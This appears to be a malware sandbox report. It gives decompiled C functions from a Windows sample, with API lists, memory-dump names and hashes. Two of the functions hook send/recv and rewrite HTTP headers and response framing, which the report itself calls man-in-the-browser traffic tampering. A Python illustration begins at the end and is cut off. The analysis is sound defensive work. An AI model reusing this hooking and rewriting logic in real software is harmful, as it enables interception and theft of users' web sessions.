    					E0041CB6F( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x4228e0, _a4, 0);
    					goto L23;
    				} else {
    					_t70 = GetMenu(_a4);
    					if(_t70 == 0) {
    						goto L23;
    					}
    					_v24 = _v24 | 0xffffffff;
    					_t46 = GetMenuItemCount(_t70);
    					_t63 = 0;
    					_v28 = _t46;
    					if(_t46 <= 0) {
    						L8:
    						_t47 =  *0x4228f0; // 0x0
    						_push(_t47[0x104]);
    						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
    						if(_t64 == 0xffffffff) {
    							goto L23;
    						}
    						_v28 = GetMenuState(_t70, _t64, 0x400);
    						if(_v24 != _t64) {
    							EndMenu();
    						}
    						HiliteMenuItem(_a4, _t70, _t64, 0x480);
    						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
    							if((_v28 & 0x00000010) == 0) {
    								if((_v28 & 0x00000800) == 0) {
    									_t51 = GetMenuItemID(_t70, _t64);
    									if(_t51 == 0xffffffff) {
    										goto L23;
    									}
    									L20:
    									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
    									goto L23;
    								}
    								_t51 = 0;
    								goto L20;
    							}
    							_t74 = GetSubMenu(_t70, _t64);
    							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
    								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
    							}
    						}
    						goto L23;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						if(GetMenuState(_t70, _t63, 0x400) < 0) {
    							HiliteMenuItem(_a4, _t70, _t63, 0x400);
    							_v24 = _t63;
    						}
    						_t63 = _t63 + 1;
    					} while (_t63 < _v28);
    					goto L8;
    				}
    			}

    APIs
    • GetMenu.USER32(?), ref: 0040823A
    • GetMenuItemCount.USER32 ref: 00408250
    • GetMenuState.USER32 ref: 00408268
    • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00408278
    • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040829E
    • GetMenuState.USER32 ref: 004082B2
    • EndMenu.USER32 ref: 004082C2
    • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 004082D2
    • GetSubMenu.USER32 ref: 004082F6
    • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 00408310
    • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 00408331
    • GetMenuItemID.USER32(00000000,00000000), ref: 00408349
    • SendMessageW.USER32(?,00000111,?,00000000), ref: 00408362
    • SetKeyboardState.USER32 ref: 004083A1
    • SetEvent.KERNEL32 ref: 004083AD
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
    • String ID:
    • API String ID: 751066993-0
    • Opcode ID: faa9f9a26b25cca0c83c5a70e68291b6b8aa994f7a61f6927e60d1c9f1f7d467
    • Instruction ID: 73f3e8c21218699856508977a9ca5b156e00ce5e360b53b26d0eecd0168d86d0
    • Opcode Fuzzy Hash: faa9f9a26b25cca0c83c5a70e68291b6b8aa994f7a61f6927e60d1c9f1f7d467
    • Instruction Fuzzy Hash: 29419930004304AFD7119F24DE88A6B7AA8FB85B64F00463EFDD5A11F0CB79C905DAA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A08E() {
    				struct HINSTANCE__* _t2;
    				_Unknown_base(*)()* _t7;
    				void* _t9;
    
    				if( *0x424020 != 0) {
    					L9:
    					 *0x424020 =  *0x424020 + 1;
    					return 1;
    				} else {
    					_t2 = LoadLibraryA("cabinet.dll");
    					 *0x42401c = _t2;
    					if(_t2 == 0) {
    						L8:
    						return 0;
    					} else {
    						 *0x424008 = GetProcAddress(_t2, "FCICreate");
    						 *0x42400c = GetProcAddress( *0x42401c, "FCIAddFile");
    						 *0x423240 = GetProcAddress( *0x42401c, "FCIFlushCabinet");
    						_t7 = GetProcAddress( *0x42401c, "FCIDestroy");
    						 *0x424014 = _t7;
    						if( *0x424008 == 0 ||  *0x42400c == 0 ||  *0x423240 == 0 || _t7 == 0) {
    							L7:
    							FreeLibrary( *0x42401c);
    							goto L8;
    						} else {
    							_t9 = HeapCreate(0, 0x80000, 0);
    							 *0x42323c = _t9;
    							if(_t9 != 0) {
    								goto L9;
    							} else {
    								goto L7;
    							}
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0041A175,?,0041A391,?,?,00000000,?), ref: 0041A0A2
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0041A0C2
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 0041A0D4
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0041A0E6
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 0041A0F8
    • HeapCreate.KERNEL32(00000000,00080000,00000000,0041A391,?,?,00000000,?), ref: 0041A123
    • FreeLibrary.KERNEL32(0041A391,?,?,00000000,?), ref: 0041A138
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: a1a42db360ef3ee7bd6f9eb33ae6896c251c27c8c0c64e55c6b4e31ca721290a
    • Instruction ID: 6b50afa5e87b1249edae2e54fe58a54c5a8d9997ea678dcde8da3171a73c353f
    • Opcode Fuzzy Hash: a1a42db360ef3ee7bd6f9eb33ae6896c251c27c8c0c64e55c6b4e31ca721290a
    • Instruction Fuzzy Hash: 66113C70B85210EACB31AFA4BD089967B61F7D87117A48537E644A2274D73848D3EF2D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00413612(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
    				intOrPtr _v20;
    				void* _v24;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				void* _v44;
    				void* _v60;
    				signed int _v72;
    				char _v76;
    				signed int _v80;
    				signed int _v84;
    				signed char _v88;
    				signed int _v92;
    				void* _v96;
    				intOrPtr _v104;
    				signed int _v108;
    				void* _v112;
    				void* _v132;
    				void* __esi;
    				signed int _t111;
    				signed int _t113;
    				signed char _t114;
    				signed int _t115;
    				void* _t117;
    				signed char _t121;
    				signed int _t122;
    				signed int _t125;
    				signed int _t128;
    				signed char _t130;
    				signed char _t136;
    				intOrPtr _t149;
    				void* _t165;
    				signed char _t166;
    				void* _t172;
    				intOrPtr _t178;
    				signed int _t184;
    				void* _t186;
    				void* _t188;
    				signed int _t202;
    				signed int _t203;
    				signed int _t205;
    				void* _t207;
    
    				_t207 = (_t205 & 0xfffffff8) - 0x5c;
    				if(E0040EEE1() == 0 || _a8 == 0 || _a12 <= 0) {
    					L9:
    					_t111 =  *0x42306c(_a4, _a8, _a12);
    					goto L10;
    				} else {
    					EnterCriticalSection(0x42307c);
    					_t192 = _a4;
    					_t184 = E00412696(_a4);
    					_v84 = _t184;
    					if(_t184 == 0xffffffff) {
    						L8:
    						LeaveCriticalSection(0x42307c);
    						goto L9;
    					}
    					_t186 = _t184 * 0x38 +  *0x423098;
    					if( *(_t186 + 0x20) > 0) {
    						L29:
    						_t113 =  *(_t186 + 0x24);
    						_t188 =  *(_t186 + 0x20) - _t113;
    						LeaveCriticalSection(0x42307c);
    						_t195 = _a4;
    						_t114 =  *0x42306c(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
    						_v88 = _t114;
    						__eflags = _t114 - 0xffffffff;
    						if(_t114 != 0xffffffff) {
    							EnterCriticalSection(0x42307c);
    							_t115 = E00412696(_t195);
    							__eflags = _t115 - 0xffffffff;
    							if(_t115 != 0xffffffff) {
    								_t166 = _v88;
    								_t117 = _t115 * 0x38 +  *0x423098;
    								__eflags = _t166 - _t188;
    								if(_t166 != _t188) {
    									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
    									_t92 = _t117 + 0x28;
    									 *_t92 =  *(_t117 + 0x28) - 1;
    									__eflags =  *_t92;
    									_v88 = 1;
    								} else {
    									_t88 = _t117 + 0x1c; // -4337788
    									_v88 =  *(_t117 + 0x28);
    									E0041645B(E004163A8( *_t88), _t88, 0, 0x10);
    								}
    							} else {
    								_v88 = _v88 | _t115;
    								 *0x423078(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x42307c);
    						}
    						L36:
    						_t111 = _v88;
    						L10:
    						return _t111;
    					}
    					if( *(_t186 + 8) > 0) {
    						L38:
    						LeaveCriticalSection(0x42307c);
    						_t197 = _a4;
    						_t121 =  *0x42306c(_a4, _a8, _a12);
    						_v88 = _t121;
    						__eflags = _t121 - 0xffffffff;
    						if(_t121 != 0xffffffff) {
    							EnterCriticalSection(0x42307c);
    							_t122 = E00412696(_t197);
    							__eflags = _t122 - 0xffffffff;
    							if(_t122 != 0xffffffff) {
    								_t172 = _t122 * 0x38 +  *0x423098;
    								_t178 =  *((intOrPtr*)(_t172 + 8));
    								__eflags = _v88 - _t178;
    								if(_v88 > _t178) {
    									E00412754(_t122);
    								} else {
    									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
    								}
    							} else {
    								_v88 = _v88 | _t122;
    								 *0x423078(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x42307c);
    						}
    						goto L36;
    					}
    					_t125 = E00412B8A( &_v76, _t192, _a8, _a12);
    					_v92 = _t125;
    					if(_t125 != 0xffffffff) {
    						__eflags = _v72;
    						if(_v72 == 0) {
    							L37:
    							E004152C2( &_v76);
    							_t128 = _v80 + _a12;
    							__eflags = _t128;
    							 *(_t186 + 8) = _t128;
    							goto L38;
    						}
    						_t130 = E00414994( &_v76);
    						_v88 = _t130;
    						__eflags = _t130 & 0x00000001;
    						if((_t130 & 0x00000001) == 0) {
    							_v92 = 0;
    							_v88 = 0;
    							__eflags = _t130 & 0x00000002;
    							if(__eflags != 0) {
    								_t203 = E004163FB(__eflags, _a8, _a12);
    								 *(_t207 + 0x10) = _t203;
    								__eflags = _t203;
    								if(_t203 != 0) {
    									E0041532C( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
    									E004163A8( *(_t186 + 0x14));
    									E004163A8( *((intOrPtr*)(_t186 + 4)));
    									_t149 = E00416806(_v76, _v80);
    									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
    									_t38 = _t186 + 0x18;
    									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
    									__eflags =  *_t38;
    									 *((intOrPtr*)(_t186 + 4)) = _t149;
    									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
    									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
    									 *((intOrPtr*)(_t207 + 0x14)) = E0041B2D1(E0041B2D1(E0041B34D(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
    								} else {
    									E0041532C( *((intOrPtr*)(_t207 + 0x60)), _v20);
    								}
    							}
    							__eflags = _v84 & 0x00000004;
    							if((_v84 & 0x00000004) == 0) {
    								L27:
    								__eflags = _v92;
    								if(_v92 == 0) {
    									goto L37;
    								}
    								E004152C2( &_v76);
    								_t70 = _t186 + 0x24;
    								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
    								__eflags =  *_t70;
    								 *(_t186 + 8) = _v80;
    								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
    								 *(_t186 + 0x20) = _v88;
    								 *(_t186 + 0x28) = _a12;
    								goto L29;
    							}
    							_t202 = _v92;
    							__eflags = _t202;
    							if(__eflags != 0) {
    								_t136 = _v88;
    							} else {
    								_t202 = _a8;
    								_t136 = _a12;
    							}
    							_v84 = _t136;
    							_v104 = E00412E6A(_v84, __eflags, _t202, _v40, _v36,  &_v92);
    							E004163A8( *((intOrPtr*)(_t207 + 0x44)));
    							__eflags = _v108;
    							if(_v108 != 0) {
    								__eflags = _t202 - _a8;
    								if(_t202 != _a8) {
    									E004163A8(_t202);
    								}
    							} else {
    								__eflags = _t202 - _a8;
    								if(_t202 == _a8) {
    									goto L37;
    								}
    								_v92 = _t202;
    								_v88 = _v84;
    							}
    							goto L27;
    						} else {
    							E004152C2( &_v76);
    							LeaveCriticalSection(0x42307c);
    							_t111 =  *0x423078(0xffffe8a3, 0) | 0xffffffff;
    							goto L10;
    						}
    					} else {
    						E00412754(_v84);
    						E004152C2( &_v76);
    						goto L8;
    					}
    				}
    			}
    Instruction addresses (one per decompiled line above, column separated from the code by extraction): 0x00413618 to 0x0041395a

    APIs
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • EnterCriticalSection.KERNEL32(0042307C), ref: 00413639
    • LeaveCriticalSection.KERNEL32(0042307C), ref: 00413697
    • LeaveCriticalSection.KERNEL32(0042307C,?), ref: 004136DE
    • LeaveCriticalSection.KERNEL32(0042307C), ref: 00413849
    • EnterCriticalSection.KERNEL32(0042307C), ref: 00413868
    • LeaveCriticalSection.KERNEL32(0042307C), ref: 004138CA
    • LeaveCriticalSection.KERNEL32(0042307C), ref: 004138F3
    • EnterCriticalSection.KERNEL32(0042307C), ref: 00413912
    • LeaveCriticalSection.KERNEL32(0042307C), ref: 0041395A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
    • String ID: Accept-Encoding$If-Modified-Since$identity$|0B
    • API String ID: 3286975823-3303431891
    • Opcode ID: 095d6681bb70f0742b4ce8830c807554461b696a0c9a977553da09480a0b5bdd
    • Instruction ID: f7a9125eb2f926b7fe9ab612fcc7f4f6cfbe0c36b05f12150c94924c615d8d2a
    • Opcode Fuzzy Hash: 095d6681bb70f0742b4ce8830c807554461b696a0c9a977553da09480a0b5bdd
    • Instruction Fuzzy Hash: 2FA17171504701EFCB10EF24D845A9EBBE0FF44715F104A2EF865A72A1C738EA95CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407F44(void** __eax, char _a4) {
    				void* __esi;
    				void* _t15;
    				void* _t16;
    				long _t17;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    				struct HDC__* _t23;
    				void* _t24;
    				void* _t25;
    				void** _t41;
    
    				_t41 = __eax;
    				_t1 =  &(_t41[7]); // 0x0
    				_t15 =  *_t1;
    				if(_t15 != 0) {
    					DeleteObject(_t15);
    				}
    				_t2 =  &(_t41[3]); // 0x0
    				_t16 =  *_t2;
    				if(_t16 != 0) {
    					CloseHandle(_t16);
    				}
    				_t3 =  &(_t41[1]); // 0x0
    				_t17 =  *_t3;
    				if(_t17 != 0xffffffff) {
    					TlsFree(_t17);
    				}
    				_t4 =  &(_t41[5]); // 0x0
    				_t18 =  *_t4;
    				if(_t18 != 0) {
    					CloseHandle(_t18);
    				}
    				_t5 =  &(_t41[4]); // 0x0
    				_t19 =  *_t5;
    				if(_t19 != 0) {
    					UnmapViewOfFile(_t19);
    				}
    				_t20 =  *_t41;
    				if(_t20 != 0) {
    					_t20 = CloseHandle(_t20);
    				}
    				if(_a4 != 0) {
    					_t7 =  &(_t41[0x56]); // 0x0
    					_t21 =  *_t7;
    					if(_t21 != 0) {
    						_t8 =  &(_t41[0x55]); // 0x0
    						SelectObject( *_t8, _t21);
    					}
    					_t9 =  &(_t41[0x57]); // 0x0
    					_t22 =  *_t9;
    					if(_t22 != 0) {
    						DeleteObject(_t22);
    					}
    					_t10 =  &(_t41[0x55]); // 0x0
    					_t23 =  *_t10;
    					if(_t23 != 0) {
    						DeleteDC(_t23);
    					}
    					_t11 =  &(_t41[0x58]); // 0x0
    					_t24 =  *_t11;
    					if(_t24 != 0) {
    						CloseHandle(_t24);
    					}
    					_t12 =  &(_t41[0x60]); // 0x0
    					_t25 =  *_t12;
    					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
    						_t13 =  &(_t41[0x62]); // 0x0
    						PostThreadMessageW( *_t13, 0x12, 0, 0);
    					}
    					_t20 = E00417DB7( &(_t41[0x5f]));
    				}
    				return _t20;
    			}
    Instruction addresses (one per decompiled line above, column separated from the code by extraction): 0x00407f4c to 0x0040801c

    APIs
    • DeleteObject.GDI32(00000000), ref: 00407F57
    • CloseHandle.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F67
    • TlsFree.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F72
    • CloseHandle.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F80
    • UnmapViewOfFile.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F8A
    • CloseHandle.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407F97
    • SelectObject.GDI32(00000000,00000000), ref: 00407FB1
    • DeleteObject.GDI32(00000000), ref: 00407FC2
    • DeleteDC.GDI32(00000000), ref: 00407FCF
    • CloseHandle.KERNEL32(00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407FE0
    • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00407FEF
    • PostThreadMessageW.USER32 ref: 00408008
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
    • String ID:
    • API String ID: 1699860549-0
    • Opcode ID: e1931e726338d5d7c0707eb620d881f59aa4bf5d34cade9d11e8241ad7df0f14
    • Instruction ID: bbb89d4863fd8f905a1d22a1898c0a9862d0f77f870902f20f62b8a962c2d561
    • Opcode Fuzzy Hash: e1931e726338d5d7c0707eb620d881f59aa4bf5d34cade9d11e8241ad7df0f14
    • Instruction Fuzzy Hash: 05212C706047029BD7209B79DD48B57B3ECAF44751F04493AE895F32E0CB78F8448A29
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E004132F8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v20;
    				void* _v24;
    				void* _v28;
    				char _v36;
    				char _v40;
    				signed int _v44;
    				void* _v48;
    				signed int _v52;
    				void* _v56;
    				intOrPtr _v60;
    				void* _v72;
    				void* _v80;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t99;
    				signed int _t100;
    				signed int _t101;
    				intOrPtr _t103;
    				void* _t104;
    				signed int _t107;
    				signed int _t108;
    				signed int _t110;
    				intOrPtr _t119;
    				void* _t131;
    				signed int _t139;
    				void* _t149;
    				struct _CRITICAL_SECTION* _t153;
    				intOrPtr _t155;
    				signed int _t168;
    				signed int _t174;
    				char _t176;
    				void* _t177;
    				intOrPtr _t179;
    				void* _t182;
    				signed int _t183;
    				intOrPtr _t186;
    				void* _t188;
    				signed int _t189;
    				void* _t191;
    				void* _t192;
    				void* _t193;
    				signed int _t195;
    				void* _t197;
    				void* _t199;
    
    				_t197 = (_t195 & 0xfffffff8) - 0x34;
    				_t99 = E0040EEE1();
    				_t179 = _a4;
    				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
    					L40:
    					_t100 =  *0x4230a0(_t179, _a8, _a12);
    					goto L41;
    				} else {
    					_t153 = 0x42307c;
    					EnterCriticalSection(0x42307c);
    					_t101 = E00412696(_t179);
    					if(_t101 == 0xffffffff) {
    						L39:
    						LeaveCriticalSection(_t153);
    						goto L40;
    					}
    					_t103 = _t101 * 0x38 +  *0x423098;
    					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
    						L32:
    						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
    						_t85 = _t103 + 0x2c; // -4337772
    						_t173 = _t85;
    						__eflags = _a12 - _t182;
    						_t183 =  <  ? _a12 : _t182;
    						_t104 = E004163E4(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
    						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
    						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
    						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
    							E0041645B(E004163A8( *_t173), _t173, 0, 0xc);
    						}
    						LeaveCriticalSection(_t153);
    						_t100 = _t183;
    						L41:
    						return _t100;
    					}
    					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
    						goto L39;
    					}
    					LeaveCriticalSection(0x42307c);
    					_t107 =  *0x4230a0(_t179, _a8, _a12);
    					_t199 = _t197 + 0xc;
    					_v52 = _t107;
    					if(_t107 <= 0xffffffff) {
    						L38:
    						_t100 = _v52;
    						goto L41;
    					}
    					EnterCriticalSection(0x42307c);
    					_t108 = E00412696(_t179);
    					_t174 = _t108;
    					if(_t174 == 0xffffffff) {
    						L35:
    						_push(8);
    						_push(0xffffe890);
    						L36:
    						 *0x423078();
    						_v52 = _v52 | 0xffffffff;
    						L37:
    						LeaveCriticalSection(_t153);
    						goto L38;
    					}
    					_t168 = _v52;
    					if(_t168 == 0) {
    						L11:
    						_t176 = _t174 * 0x38 +  *0x423098;
    						_v36 = _t176;
    						if(_t168 > 0) {
    							E004163E4( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
    							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
    						}
    						_t110 = E00412F1C(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
    						_v52 = _t110;
    						if(_t110 == 1) {
    							_t119 = E004130C6( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
    							_v60 = _t119;
    							if(_t119 == 1) {
    								if(E00414E0E( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
    									_t155 = _v40;
    									_t186 = E00416378( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
    									_v40 = _t186;
    									if(_t186 != 0) {
    										_t131 = E004163E4(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
    										_push(_t155);
    										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
    											E00416B51(_t199 + 0x28);
    											_t188 = E0041B34D(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
    											E004163E4(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
    											_t189 = _t188 + _t155;
    											__eflags = _t189;
    										} else {
    											_push("%x\r\n");
    											_t191 = _t186 + _t131;
    											_t177 = 0xd;
    											_t192 = _t191 + E004170DF(_t131, _t177, _t191);
    											E004163E4(_t192, _v48, _t155);
    											_t193 = _t192 + _t155;
    											E004163E4(_t193, "\r\n0\r\n\r\n", 7);
    											_t176 = _v60;
    											_t189 = _t193 + 7;
    										}
    										_t137 =  *((intOrPtr*)(_t176 + 0x18));
    										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
    											_t189 = _t189 + E004163E4(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
    										}
    										E004163A8( *((intOrPtr*)(_t176 + 0x14)));
    										_t139 = _v44;
    										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
    										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
    									}
    								}
    								_v44 = _v44 | 0xffffffff;
    								E004163A8(_v48);
    							}
    							_t153 = 0x42307c;
    						}
    						if(_v52 <= 0) {
    							L29:
    							if(__eflags == 0) {
    								L31:
    								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
    								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
    								 *((intOrPtr*)(_t176 + 0x34)) = 0;
    								 *((intOrPtr*)(_t176 + 0x14)) = 0;
    								 *((intOrPtr*)(_t176 + 0x18)) = 0;
    								E0041532C( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
    								_t103 = _v40;
    								 *((intOrPtr*)(_t176 + 0x10)) = 0;
    								 *((intOrPtr*)(_t176 + 0xc)) = 0;
    								goto L32;
    							}
    							__eflags = _v44 - 0xffffffff;
    							if(_v44 != 0xffffffff) {
    								goto L37;
    							}
    							goto L31;
    						} else {
    							if(_v44 != 0) {
    								__eflags = _v52;
    								goto L29;
    							}
    							_push(0);
    							_push(0xffffe892);
    							goto L36;
    						}
    					}
    					_t149 = _t108 * 0x38 +  *0x423098;
    					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
    					_t11 = _t149 + 0x14; // -4337796
    					if(E00416333( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
    						goto L35;
    					}
    					_t168 = _v52;
    					goto L11;
    				}
    			}
    Instruction addresses (one per decompiled line above, column separated from the code by extraction): 0x004132fe to 0x00413611

    APIs
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • EnterCriticalSection.KERNEL32(0042307C), ref: 00413334
    • LeaveCriticalSection.KERNEL32(0042307C), ref: 00413362
    • EnterCriticalSection.KERNEL32(0042307C), ref: 00413386
    • LeaveCriticalSection.KERNEL32(0042307C,00000000,?,00000000), ref: 004135C9
    • LeaveCriticalSection.KERNEL32(0042307C), ref: 004135E8
      • Part of subcall function 0041B34D: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-00423098,?,00000000), ref: 0041B3A7
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    • LeaveCriticalSection.KERNEL32(0042307C), ref: 004135F5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
    • String ID: 0$%x$Content-Length$|0B$|0B
    • API String ID: 4067213518-4079057073
    • Opcode ID: 1f95c2c750d472dc0308abebbda6a6d93063c3e574f119983c8855ea1cdc97fe
    • Instruction ID: 6f60bf1c1259f8d79ae8df9fe2bd6c24b24a860f7416bc584747d2028f190a16
    • Opcode Fuzzy Hash: 1f95c2c750d472dc0308abebbda6a6d93063c3e574f119983c8855ea1cdc97fe
    • Instruction Fuzzy Hash: 4B91DF72504315BFCB10DF24C98199EBBB9FF84715F01061AF864932A2C738EA95CBDA
    Uniqueness

    Uniqueness Score: -1.00%

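    The two send/recv wrappers above (the listing at 0x00413618 to 0x0041395a, which touches "Accept-Encoding", "identity", "TE" and "If-Modified-Since", and E004132F8, which touches "Content-Length", "%x\r\n" and "\r\n0\r\n\r\n") carry the strings of a classic man-in-the-browser rewrite: normalize the outbound request so the server returns a full, uncompressed, non-conditional body, then re-frame the inbound response after its body has been altered. The Python below is an added illustration of that technique written for this report; it is not code from the sample or from Joe Sandbox, the exact header handling is the editor's inference from those strings, and the HTTP messages are constructed inputs.

```python
"""Illustrative model of the HTTP request/response rewriting suggested by the
strings in the two decompiled wrappers above. Added example, not the sample's
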